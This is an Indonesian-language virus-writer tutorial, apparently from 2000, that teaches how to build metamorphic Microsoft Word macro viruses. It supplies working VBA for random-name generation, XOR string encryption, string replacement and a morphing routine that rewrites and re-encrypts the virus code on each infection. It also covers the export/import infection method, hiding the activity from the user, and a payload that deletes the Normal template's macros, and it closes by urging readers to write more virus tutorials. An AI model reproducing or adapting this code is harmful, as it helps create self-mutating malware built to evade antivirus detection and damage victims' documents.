'--[ M0RPH3R.metamorphozer ]------------------------------------[ BOF ]--'

.-------------.
| PERHATIAN ! |
|-------------'----------------------------------------------------------.
| Tulisan ini sengaja dibuat dalam bahasa Indonesia, mengingat kurangnya |
| tulisan VXers berbahasa Indonesia.  Jika ada yang ingin menerjemahkan- |
| nya ke dalam bahasa lain, dipersilakan dan diucapkan terimakasih ...   |
|------------------------------------------------------------------------|
| Penyebarkan informasi ini dalam bentuk file secara bebas diperbolehkan |
| tapi bentuk lain informasi ini (selain bentuk file) memerlukan perizin |
| an dari penulis. Hak cipta ada pada saya selaku pembuat informasi ini. |
|------------------------------------------------------------------------|
| Pembuat informasi ini tidak ber-tanggungjawab baik secara moril maupun |
| materil sedikitpun atas segala akibat dari artikel ini. Jika tidak se- |
| tuju akan hal tersebut, silahkan hapus file/artikel ini.               |
'------------------------------------------------------------------------'

Catatan : Virus makro yang dimaksud dalam artikel ini dibatasi hanya pada
          makro Microsoft Word (khususnya MsWord97 dan MsWord2K).



     .-----------------------.
     | M0RPH3R.metamorphozer |-.
     .-----------------------'-'----------------------------------.
     | *                                                        * |-.
     |        VIRUS MAKRO DENGAN TEKNOLOGI METAMORPHOZER !        | |
     | *                                                        * | |
     '-.----------------------------------------------------------' |
       '------------------------------------------------------------'

							       = M0RPH3R =




Ide untuk membuat VirusMakro (VM) yang bisa berubah-ubah, baik nama, isi
maupun ukurannya (hal ini saya namakan 'MORPHING') terbesit sudah lama di
otak dan di HardDisk saya :-) Hingga tulisan ini di-rilis pun, saya belum
memperoleh cara untuk membuat VM benar-benar morphing persis seperti apa
yang saya pikirkan.



.-----------------------------------.
| Morphing pada Makro, Mungkinkah ? |
'-----------------------------------'

Visual Basic for Application (VBA) pada MsWord saya anggap (saat ini) se -
bagai High Level Language (HLL) yang berhaluan 'script', maksudnya : kita
masih dapat mengamati dan meng-edit SourceCode-nya (saya lebih suka menye-
but 'DNA virus' untuk SourceCode ini). Oleh karena itu, sebenarnya tidak
ada VM (saat ini) yang susah untuk diidentifikasi, selalu saja ada string
yang menjadi sidikjari/identitas pencarian ...

Lihat baris-baris perintah VBA berikut :

Sub Pesan()
MsgBox "Je pense donc je suis", vbInformation, _
       "M0RPH3R - Survival of The Smarttest !"
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.DeleteLines _
1, NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
End Sub

String "M0RPH3R - Survival of The Smarttest !" maupun "Je pense donc je
suis" masih bisa dienkripsi, tapi baris-baris perintah :
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.DeleteLines _
1, NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
tidak dapat dienkripsi dan ini dapat dijadikan acuan untuk mengidentifi-
kasi VM (lambat-laun keberadaan VM yang menggunakan teknik morphing pun
pasti bisa 'tertangkap'). Walaupun VBA membolehkan penambahan baris-baris
perintah saat sub makro lain dijalankan, yaitu menggunakan perintah :
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.AddFromString ...
tetap saja akan ada perintah VBA yang tidak bisa dienkripsi.

Untuk saat ini juga belum ditemukan VM yang benar-benar morphing karena
VBA belum mendukung ke arah sana. Siapa tahu Microsoft kembali mendukung
keberadaan VM dengan terus mengembangkan VBA-nya.



.----------------------------------.
| Beberapa Teknik Morphing pada VM |
'----------------------------------'

Morphing pada VM memang bukan barang baru bari VXers, hal ini sudah lama
digunakan. Dark Night dalam tutorialnya, memaparkan mengenai VM polymorphic
tapi sayang ke-polymorphic-kan VM-nya sebatas penggantian nama makro saja.
Lihat cuplikan 'DNA virus' berikut ini (Coded by The Nightmare Joker) :

Sub Run2
X$ = Fun$(F$, G$, H$, J$)
Y$ = Fun$(F$, G$, H$, J$)
Z$ = X$ + Y$
R2$ = GetDocumentVar$("VirName")
OC$ = FileName$() + ":" + R2$
MacroCopy OC$, "Global:" + Z$
SetProfileString "Intl", "Info1", Z$
ToolsCustomizeKeyboard .KeyCode = 32, .Category = 2, 
                       .Name = Z$, .Add, .Context = 0
End Sub

CyberPhantom di Cyber-Magazine-nya memaparkan VM yang dapat bermutasi 
sendiri. Teknik mutasinya menggunakan fasilitas EditReplace pada MsWord,
ini mudah dilakukan pada MsWord 6.0 karena macro editornya bersatu dengan
Word editor. Lihat cuplikan 'DNA virus' berikut ini :

Sub mutat
ToolsMacro .Name = "XXXXX", .Edit, .Show = 1
StartOfDocument
dnatx$ = GetText$(606, 611)'mutat
EditReplace .Find = dnatx$, .Replace = Rndnm$, .Direction = 0,
            .MatchCase = 0, .WholeWord = 0, .PatternMatch = 0,
	    .SoundsLike = 0, .ReplaceAll, .Format = 0, .Wrap = 1,
	    .FindAllWordForms = 0
...
dnatx$ = GetText$(1299, 1304)'dnatx
EditReplace .Find = dnatx$, .Replace = Rndnm$, .Direction = 0,
            .MatchCase = 0, .WholeWord = 0, .PatternMatch = 0,
	    .SoundsLike = 0, .ReplaceAll, .Format = 0, .Wrap = 1,
	    .FindAllWordForms = 0
DocClose 1
End Sub

Pada MsWord97/2K hal ini dapat dilakukan dengan cara yang sama, tapi kita
perlu mengakali agar prosesnya tidak terlihat oleh user. Langkah-langkah
dasarnya adalah :

1. Ekspor 'DNA virus' VM kita (sumber VM dianggap dari NormalTemplate).
   Application.VBE.ActiveVBProject.VBComponents("NamaMakroLama").Export _
               "c:\m.bas"
2. Buka "c:\m.bas".
   Documents.Open FileName:="c:\m.bas", ConfirmConversions:=False, _
                  ReadOnly:=False, AddToRecentFiles:=False
3. Lakukan penggantian string dengan fasilitas FindAndReplace-nya MsWord.
   Proses ini dilakukan terhadap string-string yang akan kita ubah, misal
   nya kita akan mengubah "NamaMakroLama" menjadi "NamaMakroBaru" dan se-
   baiknya kita menggunakan string yang di-random untuk nama-nama makro
   ini. Lakukan juga pengubahan string nama-nama makro pada 'module' makro
   keseluruhan dan string-string lain yang bisa diubah.
   Selection.Find.ClearFormatting
   Selection.Find.Replacement.ClearFormatting
   With Selection.Find
        .Text = "NamaMakroLama"
        .Replacement.Text = "NamaMakroBaru"
        .Forward = True
        .Wrap = wdFindContinue
        .MatchCase = True
   End With
   Selection.Find.Execute Replace:=wdReplaceAll
4. Simpan file "c:\m.bas" sebagai file teks murni.
   ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, _
                  FileFormat:=wdFormatText, AddToRecentFiles:=False
5. Tutup file "c:\m.bas" 
   ActiveDocument.Close SaveChanges:=False
6. Impor 'DNA virus' VM kita ke dokumen aktif.
   ActiveDocument.VBProject.VBComponents.Import "c:\m.bas"
7. Save dokumen dengan format wdDocument.
   ActiveDocument.OptimizeForWord97 = True
   ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, _
                  FileFormat:=0, AddToRecentFiles:=0

Yang harus diperhatikan dengan menggunakan teknik di atas adalah :
- Saat melakukan proses 2 sampai 5 usahakan proses tidak terlihat. Hal ini
  dapat diatasi dengan cara meminimize tampilan MsWord :
	Application.WindowState = wdWindowStateMinimize
        (Lakukan proses 1, 2, 3, 4 dan 5)
        Application.WindowState = wdWindowStateMaximize
  atau dengan men-disable perubahan tampilan :
        Application.ScreenUpdating = False
       (Lakukan proses 1, 2, 3, 4 dan 5)
        Application.ScreenUpdating = True
- Cegah penginfeksian pada file teks "c:\m.bas" ! Ini bisa diatasi salah
  satunya dengan mend-disable AutoMacros :
        WordBasic.DisableAutoMacros True
        (Lakukan proses 1, 2, 3, 4 dan 5)
        WordBasic.DisableAutoMacros False

VeggieTailz (Hi girl! :-)) dengan Vengine-nya menggunakan teknik yang ber-
beda, yaitu dengan menggunakan daftar/tabel string-string. Keuntungannya
adalah tidak perlu repot-repot melakukan langkah 2 sampai 5 dan lebih aman
karena tidak se-mencurigakan teknik di atas, tapi kerugiannya terbesarnya
adalah string string tersebut telah ditentukan pada tabel (terdaftar di-
'DNA virus'-nya) dan ini akan mempermudah AV untuk mengidentifikasi semua
string tersebut.

Lihat cuplikan Vengine berikut ini :

Private Sub InfectTable()
  ReDim QC2cz(29)  ' don't forget to set the array size!
  QC2cz(1) = "Infect"
  QC2cz(2) = "InfectTable"
  QC2cz(3) = "Zy7td"
  ...
  QC2cz(27) = "Sh6k"
  QC2cz(28) = "T2w"
  QC2cz(29) = "Ky8c"  ' add your entries here!
End Sub

Sebanyak, sepanjang dan se-aneh apapun string yang terdaftar tetap bisa
diidentifikasikan keberadaannya. Jika Anda ingin menggunakan teknik ini
usahakan banyak dan panjangnya string yang terdaftar selalu berubah-ubah
setiap infeksi terjadi, misalnya jika generasi ke-1 memiliki daftar 29
string, maka generasi ke-2 memiliki daftar string 99, generasi ke-3 me-
miliki daftar string 19 dan seterusnya.



.-----------------------------------------.
| Teknologi Metamorphozer dan Aplikasinya |
'-----------------------------------------'

Teknologi Metamorphozer, itulah nama yang dipilih untuk teknik ini dan VM
yang dijadikan contoh adalah M0RPH3R (nama saya sendiri :-)), walaupun ke-
nyataannya tidak secanggih dan sehebat arti metamorphozer sebenarnya.

Suatu VM dikatakan 'berubah' secara metamorphic apabila ukurannya tubuhnya
tidak bisa/susah untuk ditetapkan, 'isi' / 'bentuk' tubuhnya berubah-ubah,
dan nama-nya berubah-ubah. Dengan menyadari bahwa perubahan-perubahan itu
berdasar pada berubahnya seluruh atau sebagian string pada tubuh VM terse-
but maka dapat kita ketahui rahasia-nya, operasi string !
Kita harus bisa menguasai seluruh string yang ada pada tubuh VM dan bisa
mengotak-atiknya, karena teknologi ini benar-benar berpijak pada operasi
string; 95% operasi string dan 5% kecerdikan :-)

Metamorphozer ini masih didasarkan pada perubahan nama, ukuran dan isi VM
itu sendiri. Prinsip utamanya adalah dengan adanya :
1. Generator String Teracak (RandomedStringGenerator, RSGen).
   Dengan RSGen ini kita dapat menghasilkan data berupa string yang ter-
   acak, baik jumlah karakter maupun jenis karakternya (angka, huruf besar
   atau huruf kecil). Agar string dapat digunakan untuk nama-nama makro,
   maka karakter awalnya tidak boleh angka (syarat nama makro) jadi setiap
   string yang dihasilkan tidak mungkin berawalan karakter angka. Dan ka-
   rakter-karakter yang tidak dapat digunakan untuk penamaan tidak dipakai
   dalam RSGen ini.
2. Penyandi String (StringCryptor).
   Tentu saja penyandian/pengenkripsian & pendekripsian (Kriptor/Cryptor)
   menjadi hal penting dalam melindungi 'DNA virus' dan juga bagi VM yang
   ber-metamorphozer sebagai salah satu cara 'mengubah' teknik kriptor 
   setiap kali infeksi, sehingga string pun ikut berubah.
3. Penggati String (StringReplacer).
   Setelah string teracak dihasilkan sangatlah perlu menggantikan suatu
   string dengan string teracak ini (atau string lainnya), maka dari itu
   pengganti string atau StringReplacer mutlak dibutuhkan. Metamorphozer
   ini tidak menggunakan fasilitas FindAndReplace-nya MsWord.
4. Pengganti String Khusus (SpecialStringReplacer).
   Ada satu lagi yang diperlukan khususnya untuk virus-virus makro yang
   menggunakan teknik ini, yaitu pengganti string yang mampu mengganti
   'string-string berbeda dengan spesifikasi yang sama', untuk lebih jelas
   nya perhatikan ini :

   Sub Replikator()
   NamaVirus = Kriptor("c7Xbd801sjd", "m16dsg7")
   Pesan = Kriptor("Pds09jkdsmlnslkfdoui aKS -1209 ASKlkn", "m16dsg7")
   ...
   End Sub
   Private Function Kriptor(DataStr, FrKunci)
   ...
   End Function

   Untuk mengganti semua string "m16dsg7" menjadi (misalnya) "j98FAdjsG"
   cukup mudah, yaitu dengan menggunakan fasilitas poin 3 di atas. Tapi
   untuk mengganti semua string yang berada diantara Kriptor(" dan ",
   yaitu string "c7Xbd801sjd" dan "Pds09jkdsmlnslkfdoui aKS -1209 ASKlkn"
   menjadi tidak efektif jika menggunakan teknik poin 3 di atas, karena
   setiap string diantara Kriptor(" dan ", bisa berbeda-beda. Oleh karena
   itu diperlukan pengganti String Khusus ini, sehingga kita hanya memerlu
   kan sedikit perintah untuk melakukannya.

Sedangkan teknik infeksi yang digunakan M0RPH3R adalah eXim (export-import
makro maksudnya :-)) dan bisa digunakan teknik lain, tapi jangan mengguna-
kan 'WordBasic.MacroCopy' dan 'Application.OrganizerCopy' dalam teknik in-
feksi karena perintah ini tidak berlaku pada MsWord97 SR-1 dan SR-2 (thanx
to VicodinES for your information). Atau mungkin Anda menemukan teknik in-
feksi baru ?

Amati dan pelajari baris-baris perintah VBA pada M0RPH3R berikut ini :

.---------------------------------.
| RandomedStringGenerator / RSGen |
|---------------------------------'--------------------------------------.
| Nama            : AcakStr (AcakString)                                 |
| Jenis           : Private Function                                     |
| Kegunaan        : Menghasilkan string teracak (gabungan antara angka,  |
|                   huruf kecil dan huruf besar) dengan jumlah karakter  |
|                   tertentu dan karakter awal pasti berupa huruf.       |
| Cara Penggunaan : AcakStr(JumlahMinKarakter, JumlahMaksKarakter)       |
| Contoh          : AcakStr(7, 19)                                       |
|                   Menghasilkan String teracak dengan jumlah karakter   |
|                   dari 7 hingga 19 dan karakter awal berupa huruf.     |
|------------------------------------------------------------------------|
| (c)2000, M0RPH3R of ShadowDancer                                       |
'------------------------------------------------------------------------'

Private Function AcakStr(JumMin As Byte, JumMaks As Byte)
' (c)2000, M0RPH3R of ShadowDancer
'          M0RPH3R - Survival of The Smarttest !
On Error Resume Next                       ' Kalau 'error' cuek aza ...
Randomize Timer                            ' Acak angka menurut waktu
ReAcak:
If JumMaks <> JumMin Then                  ' Jika JumMin <> JumMaks, maka
   JumKar = Int((JumMaks * Rnd) + JumMin)  '      acak angka dari JumMin
   If JumKar < JumMin Or JumKar > JumMaks Then GoTo ReAcak
   ' Jika JumKar < 7 atau JumKar > 19 (salah) maka pengacakkan diulangi !
Else                                       '      sd. JumMaks
   JumKar = JumMaks                        ' Jika sama maka JumKar=JumMaks
End If                                     ' (panjang string ditetapkan !)
For m = 1 To JumKar
    Acak3 = Int(3 * Rnd + 1)               ' Acak angka dari 1 sd. 3
    Select Case Acak3                      ' jika Acak3 keluar :
           Case 1                          ' - Angka 1, maka :
                Kar = Int((25 * Rnd) + 65) '   Kar = 1 huruf dari A sd. Z
           Case 2                          ' - Angka 2, maka :
                Kar = Int((25 * Rnd) + 97) '   Kar = 1 huruf dari a sd. z
           Case 3                          ' - Angka 3 (jika ini karakter
                If m = 1 Then GoTo ReAcak  '   pertama maka acak diulang;
                ' karakter pertama nama makro tidak boleh berupa angka !
		' Berguna jika hasil AcakStr digunakan untuk nama makro
                Kar = Int((9 * Rnd) + 48)  '   Kar = 1 angka dari 0 sd. 9
    End Select
    AcakStr = AcakStr + Chr(Kar)           ' AcakStr = gabungan Chr(Kar)
Next m                                     ' Ulangi lagi sebanyak m
End Function

.---------.
| Kriptor |
|---------'--------------------------------------------------------------.
| Nama            : KripXor (Kriptor dengan teknik Xor)                  |
| Jenis           : Private Function                                     |
| Kegunaan        : Menyandi (enkripsi/dekripsi) string DataStr dengan   |
|                   teknik Xor dengan string pada FrKunci.               |
| Cara Penggunaan : KripXor(StringYgAkanDisandi, KataKunci)              |
| Contoh          : KripXor("T%$>D.8 (#9", "M0RPH3R")                   |
|                   Melakukan Xor terhadap string "T%$>D.8 (#9" dengan  |
|                   string "M0RPH3R" yang menghasilkan "ThisDocument".   |
|------------------------------------------------------------------------|
| (c)2000, M0RPH3R of ShadowDancer                                       |
'------------------------------------------------------------------------'

Private Function KripXor(DataStr, FrKunci)
' (c)2000, M0RPH3R of ShadowDancer
'          M0RPH3R - Survival of The Smarttest !
On Error Resume Next                     ' Kalau 'error' cuek aza ...
For m = 0 To (Len(DataStr) - 1)          ' ulang sebanyak karakter DataStr
    KrTanda = ""                         ' kosongkan isi KrTanda
    ChrAKeN = Mid(DataStr, m + 1, 1)     ' ChrAKeN = ambil satu karakter
    If IniKrTnd = True Then              ' Jika ada KarakterTanda, maka :
       ChrXKeN = ChrAKeN                 ' ChrXKeN = ChrAKeN, tidak diubah
       IniKrTnd = False                  ' Set 'IniKrTnd' jadi 'False'
       GoTo Xored                        ' Lompat ke Xored
    End If
    If ChrAKeN = Chr(31) Then            ' Jika ChrAKeN =  KarakterTanda
       IniKrTnd = True                   ' Set 'IniKrTnd' jadi 'True'
       GoTo AdaTanda                     ' Lompat ke AdaTanda
    End If
    If ChrAKeN = Chr(30) Then ChrAKeN = Chr(34)
       ' Jika ChrAKeN = Chr(30) maka jadikan ChrAKeN = Chr(34)
       ' untuk menghindari munculnya Chr(34) / tanda kutip ("), maka
       ' setiap Chr(34) dari DataStr diubah langsung menjadi Chr(30) dan
       ' di sini dibalikkan prosesnya. hasil pengubahan dikembalikan lagi
    If n = "" Or n > Len(FrKunci) Then n = 0
    ' n = urutan karakter pada FrKunci, jika sudah habis ulangi dari awal
    ChrFKeN = Mid(FrKunci, n + 1, 1)
    ' ChrFKeN adalah karakter yang diambil dari FrKunci satu persatu
    ChrXKeN = Chr(Asc(ChrAKeN) Xor Asc(ChrFKeN))
    ' Lakukan proses Xor antara ChrAKeN dengan ChrFKeN
    ' Misalnya DataStr = "ThisDocument" dan FrKunci = "M0RPH3R", maka
    ' (proses enkripsi)
    ' DataStr  : ThisDocument
    ' FrKunci  : M0RPH3RM0RPH (jika karakter FrKunci habis, maka diulang)
    '            ------------ Xor
    ' Hasilnya   T%$>D.8 (#9  (perhatikan proses ***)
    ' Jika proses ini dibalikkan (proses dekripsi), maka :
    ' DataStr  : T%$>D.8 (#9
    ' FrKunci  : M0RPH3RM0RPH (jika karakter FrKunci habis, maka diulang)
    '            ------------ Xor
    ' Hasilnya   ThisDocument
      If ChrXKeN = Chr(34) Then ChrXKeN = Chr(30)
       ' Jika ChrAKeN = Chr(34) maka jadikan ChrAKeN = Chr(30)
       ' untuk menghindari munculnya Chr(34) / tanda kutip ("), maka
       ' setiap Chr(34) dari DataStr diubah langsung menjadi Chr(30)
    If Asc(ChrXKeN) < 32 Or (Asc(ChrXKeN) > 126 _
       And Asc(ChrXKeN) < 161) Then
       ' *** di sini dilakukan seleksi hasil Xor, jika ternyata hasil Xor
       ' tersebut merupakan Chr(n) yang dilai n-nya kurang dari 32 atau
       ' diantara 126 dan 161 maka batalkan pengubahan ! Hal ini dilakukan
       ' untuk menghindari munculnya karakter-karakter yang tidak bisa di-
       ' tampilkan di Windows; Sebenarnya Anda bisa saja menggunakan semua
       ' karakter ASCII yang ada (1-255) tapi karakter-karakter seperti
       ' Enter/Chr(13), LineFeed/Chr(10), Tab/Chr(9) atau BackSpace/Chr(8)
       ' dapat mengganggu proses Kriptor berikutnya.
       KrTanda = Chr(31)                    ' Batalkan perubahan !
                                            ' Set KrTanda sebagai Chr(30)
       ChrXKeN = ChrAKeN                    ' Isi ChrXKeN dengan ChrZKeN
       GoTo Xored                           ' Lompat ke Xored
    End If
    ChrXKeN = KrTanda & ChrXKeN             ' Lakukan perubahan !
                                            ' Gabung KrTanda + ChrXKeN
Xored:
    KripXor = KripXor + ChrXKeN             ' Kumpulkan satu-persatu hasil
                                            ' Xor di KripXor
AdaTanda:
Next m                                  ' Lakukan pada karakter berikutnya
End Function

.----------------.
| StringReplacer |
|----------------'-------------------------------------------------------.
| Nama            : Ganti (Pencari dan Pengganti String)                 |
| Jenis           : Private Function                                     |
| Kegunaan        : Mencari dan mengganti suatu string (Teks1) dengan    |
|                   string lainnya (Teks2) pada suatu file teks tanpa    |
|                   harus menggunakan fasilitas FindAndReplace-nya Word. |
| Cara Penggunaan : Ganti(StringYgAkanDiganti, StringPengganti)          |
| Contoh          : Ganti "cinta", "benci"                               |
|                   Mencari string 'cinta' & menggantinya dengan string  |
|                   'benci' pada suatu file teks ("c:\M0RPH3R.DNA")      |
|                   Sebelum : "cinta hanyalah bagi pecinta cinta !"      |
|                   Sesudah : "benci hanyalah bagi pebenci benci !"      |
|------------------------------------------------------------------------|
| (c)2000, M0RPH3R of ShadowDancer                                       |
'------------------------------------------------------------------------'

Private Function Ganti(Teks1, Teks2)
' (c)2000, M0RPH3R of ShadowDancer
'          M0RPH3R - Survival of The Smarttest !
On Error Resume Next                       ' Kalau 'error' cuek aza ...
fSumber = "c:\M0RPH3R.DNA"                 ' File 'DNA' hasil eksport
Open fSumber For Input As 3                ' Buka file 3 sebagai input
Open Left(fSumber, Len(fSumber) - 4) & ".TMP" For Output As 4
          ' buka/buat file 4 / "c:\M0RPH3R.TMP" sebagai penampung output
Do While Not EOF(3)                        ' Kerjakan sampai akhir file 3
   Line Input #3, BrsTeks                  ' BrsTeks = input per-baris
      ' Misal pd. BrsTeks, Teks1 = "cinta" diubah jadi Teks2 = "benci"
      ' BrsTeks         : "cinta hanyalah bagi pecinta cinta !"
      ' Posisi karakter :  12345678901234567890123456789012345
      ' ChrKe = 1 (posisi huruf 'c' cinta di BrsTeks)
   ChrKe = InStr(BrsTeks, Teks1)           ' Cari posisi Teks1 di BrsTeks
   If ChrKe <> 0 Then                      ' Kalau ada, maka :
      TmpTeks = Left(BrsTeks, ChrKe - 1) & Teks2 & _
                Mid(BrsTeks, ChrKe + Len(Teks1), Len(BrsTeks) - _
                (ChrKe + Len(Teks1) - 1))
      ' TmpTeks = "benci hanyalah bagi pecinta cinta !"
                                       ' ^^^^^ ^^^^^ (2 "cinta" lagi !)
      Do While ChrKe <> 0              ' Kerjakan terus sampai ChrKe = 0
         ChrKe = InStr(TmpTeks, Teks1)
         If ChrKe <> 0 Then TmpTeks = Left(TmpTeks, ChrKe - 1) & _
            Teks2 & Mid(TmpTeks, ChrKe + Len(Teks1), Len(TmpTeks) - _
            (ChrKe + Len(Teks1) - 1))
         ' BrsTeks         : "benci hanyalah bagi pecinta cinta !"
         ' Posisi karakter :  12345678901234567890123456789012345
         ' ChrKe = 23 (posisi huruf 'c' cinta di TmpTeks)
	 ' Berikutnya dihasilkan ChrKe = 29 dan :
         ' TmpTeks = "benci hanyalah bagi pebenci benci !"
      Loop
      Print #4, TmpTeks                       ' Simpan TmpTeks di file 4
   Else                                       ' Jika tdk ada Teks1, simpan
      Print #4, BrsTeks                       ' saja Teks1 seperti aslinya
                                              ' di file 4
   End If
Loop
Close 3
Close 4
Kill fSumber                                 ' Hapus file "c:\M0RPH3R.DNA"
Name Left(fSumber, Len(fSumber) - 4) & ".TMP" As fSumber
                           ' Rename "c:\M0RPH3R.TMP" jadi "c:\M0RPH3R.DNA"
End Function

.-----------------------.
| SpecialStringReplacer |
|-----------------------'------------------------------------------------.
| Kegunaan        : Mencari dan mengganti suatu string yang berada di    |
|                   antara Teks1 (KripXor(") dan tanda kutip (") berikut |
|                   nya pada suatu file teks tanpa harus menggunakan     |
|                   fungsi Ganti/StringReplacer berulang-ulang.          |
| Cara Penggunaan : Call M0RPHiNG                                        |
|------------------------------------------------------------------------|
| (c)2000, M0RPH3R of ShadowDancer                                       |
'------------------------------------------------------------------------'

Private Sub MoRPHiNG()
' (c)2000, M0RPH3R of ShadowDancer
'          M0RPH3R - Survival of The Smarttest !
On Error Resume Next                          ' Kalau 'error' cuek aza ...
NmVirus = "M0RPH3R"                           ' Nama VM saat ini "M0RPH3R"
NmVirus2 = "SD"                               ' Nama VM berikutnya "SD"
Teks1 = "KripXor" & "(" & Chr(34)
KodeGen = Chr(67) & Chr(58) & Chr(92) & NmVirus & Chr(46) & Chr(66) & _
          Chr(65) & Chr(83)                   ' KodeGen = "c:\M0RPH3R.BAS"
	  '> Data19 dan Data7 berisi daftar string yang akan di-morph !
DtKata19 = Array(NmVirus2, "Replikator", "MoRPHiNG", "AcakStr", "Ganti")
DtKata7 = Array("NmVirus2", "NmVirus", "NmMakro", "ADKena", "NTKena", _
          "Selesai", "KodeGen", "StrTD", "StrMsg", "DataStr", _
          "FrKunci", "ChrAKeN", "ChrXKeN", "Xored", "JumMaks", _
          "JumMin", "ReAcak", "JumKar", "Acak3", "Kar", "Teks1", _
          "Teks2", "fSumber", "BrsTeks", "ChrKe", "TmpTeks", _
          "DtKata7", "NmVirus2", "DtKata19", "EndFS", "BegStr", _
          "BegStr2", "MidStr", "EndStr", "ReXorStr", "StrOERN", _
          "StrDlg1", "StrDlg2", "StrEnSb", "StrSub", "CntLnNT")
Application.VBE.ActiveVBProject.VBComponents(NmVirus).Export KodeGen
                            ' Eksport 'DNA virus' sebagai "c:\M0RPH3R.BAS"
For m = 1 To 41                            '>
    Ganti DtKata7(m - 1), AcakStr(7, 9)    '>
Next m                                     '>
For n = 1 To 5                             '>
    Ganti DtKata19(n - 1), AcakStr(7, 19)  '>  (PROSES UTAMA MORPHING I)
Next n                                     '>
Ganti NmVirus, NmVirus2                    '>
Ganti ".RNA", "." & AcakStr(3, 3)          '>
Ganti ".TMP", "." & AcakStr(3, 3)          '>
Open KodeGen For Input As 1     ' Buka "c:\M0RPH3R.BAS"/1 untuk input data
Open Left(KodeGen, Len(KodeGen) - 4) & ".RNA" For Output As 2
                                ' Buka "c:\M0RPH3R.RNA"/2 untuk output data
Do While Not EOF(1)             ' Lakukan terus hingga akhir file 1
   Line Input #1, BrsTeks       ' BrsTeks berisi baris kesekian dari file 1
   ChrKe = InStr(BrsTeks, Teks1)  ' Cari Teks1 pada BrsTeks
   If ChrKe <> 0 Then             ' Kalau ada, maka kerjakan :
      BegStr = Left(BrsTeks, ChrKe - 1) & Teks1
      BegStr2 = Mid(BrsTeks, Len(BegStr) + 1, Len(BrsTeks) - Len(BegStr))
      ChrKe = InStr(BegStr2, Chr(34))
      MidStr = Left(BegStr2, ChrKe - 1)
      EndStr = Mid(BrsTeks, Len(BegStr) + Len(MidStr) + 1, _
               Len(BrsTeks) - Len(BegStr) + Len(MidStr))
      ReXorStr = KripXor(KripXor(MidStr, NmVirus), NmVirus2)
      ' Misalnya BrsTeks berisi : StrTD = KripXor("T%$>D.8 (#9", NmVirus)
      ' maka :
      '   BegStr berisi StrTD = KripXor("         (penggalan awal)
      '   BegStr2 berisi T%$>D.8 (#9", NmVirus)  (penggalan tengah-akhir)
      '   MidStr berisi T%$>D.8 (#9              (penggalan tengah)
      '   EndStr berisi ", NmVirus)               (penggalan akhir)
      '   ReXorStr berisi MidStr yang sudah di KripXor 2 kali dengan
      '   KataKunci yang berbeda (PROSES UTAMA MORPHING II)
      Print #2, BegStr & ReXorStr & EndStr ' Simpan perubahan ini pd file2
   Else                                    ' Kalau tidak ada Teks1, maka :
      Print #2, BrsTeks                    ' Simpan baris asal pada file 2
   End If
Loop                                  ' Lakukan lagi pada baris berikutnya
Close 1                                    ' Tutup file 1
Close 2                                    ' Tutup file 2
Kill KodeGen                               ' Hapus "c:\M0RPH3R.BAS"
Name Left(KodeGen, Len(KodeGen) - 4) & ".RNA" As KodeGen
                        ' Rename "c:\M0RPH3R.RNA" menjadi "c:\M0RPH3R.BAS"
Ganti "KripXor", AcakStr(7, 19)            '> Proses morphing akhir !
End Sub

Catatan : Tanda '> menunjukkan tidak berhubungannya baris ini dengan pen-
          carian dan penggantian string khusus (SpecialStringReplacer).

Prosesnya sama dengan fungsi Ganti, hanya di sini string yang akan diganti
tidak kita tentukan langsung, cukup dengan menentukan spesifikasi string
yang akan diganti, misalnya : ganti semua string yang berada di antara :
KripXor(" dan : " . Bedanya hanya pada baris "ReXorStr =",  yaitu melaku-
kan proses dekripsi yang langsung diikuti proses enkripsi dengan KataKunci
yang berbeda. Misalnya :

1. Proses dekripsi string ReXorStr "T%$>D.8 (#9" dengan KataKunci
   "M0RPH3R" : (Kita anggap sebagai generasi ke-1)
       T%$>D.8 (#9
       M0RPH3RM0RPH     --> jika KataKunci kurang, maka diulang-ulang.
       ------------ Xor
       ThisDocument
2. Lalu enkripsi hasil proses di atas. Yaitu pengenkripsian "T%$>D.8 (#9"
   dengan KataKunci baru "SD" :
       ThisDocument
       SDSDSDSDSDSD     --> jika KataKunci kurang, maka diulang-ulang.
       ------------ Xor
       T;: D<0&>6='     ==> menjadi ReXorStr yang baru ! (Gen-1)

Pada generasi berikutnya proses yang terjadi pada tahap ini adalah sebagai
berikut :                                    (Ini merupakan generasi ke-2) 
1. Proses dekripsi string ReXorStr "T;: D<0&>6='" dengan KataKunci "SD" :
       T;: D<0&>6='
       SDSDSDSDSDSD
       ------------ Xor
       ThisDocument
2. Enkripsi hasil proses di atas. Yaitu pengenkripsian "T;: D<0&>6='"
   dengan KataKunci baru hasil RSGen, yaitu "FMRI40f4hG07t3v0886" :
       ThisDocument
       FMRI40f4hG07   -->  sisa KataKunci ("t3v0886") tidak digunakan.
       ------------ Xor
       T*+1D-!7/',6     ==> menjadi ReXorStr yang baru ! (Gen-2)

Dari pemaparan di atas dapat dimengerti tujuan melakukan hal ini, yaitu
mengenkripsi ulang dengan KataKunci berbeda agar string-string yang ada
di 'DNA virus' bisa berubah-ubah setiap infeksi, mengikuti perubahan-peru
bahan pada nama makro dan variabel-variabel yang ada di dalamnya.

Semua proses inilah teknologi metamorphozer itu ...



.----------------------------.
| 'The Real Morphing Engine' |
'----------------------------'


Di akhir tulisan ini saya ingin berpendapat bahwa :

Sebenarnya metamorphozer, polymorphizer, mutator atau engine-engine (yang
bermaksud untuk mengubah suatu virus menjadi virus-virus yang 'berbeda')
yang paling sejati (the real morphing engine) adalah MANUSIA, karena tiap
manusia memiliki kreatifitas, ide dan gaya yang berbeda. Jadi jika Anda
ingin membuat 'engine' yang ideal, buatlah tutorial pembuatan virus,
artikel yang membahas bahas virus-virus, tips/trik dan artikel sejenisnya,
maka dengan sendirinya bermunculan virus-virus baru hasil 'MorphingEngine'
yang Anda buat !!!

Sekian dulu pembahasan mengenai VM kali ini, jika Anda memiliki saran, kri
tik, dan masukan jangan segan untuk menghubungi saya.


Catatan : Mohon maaf SourceCode/DNA virus untuk sementara belum bisa di
          tampilkan, karena sedang dalam proses peng-editan.
          Jika Anda membutuhkannya (sebelum artikel mendatang terbit) sila
          kan hubungi penulis.




                                            .-------[ M0RPH3R ]--------.
                                            | Survival of The Smartest |
                                          .-+--------------------------+-.
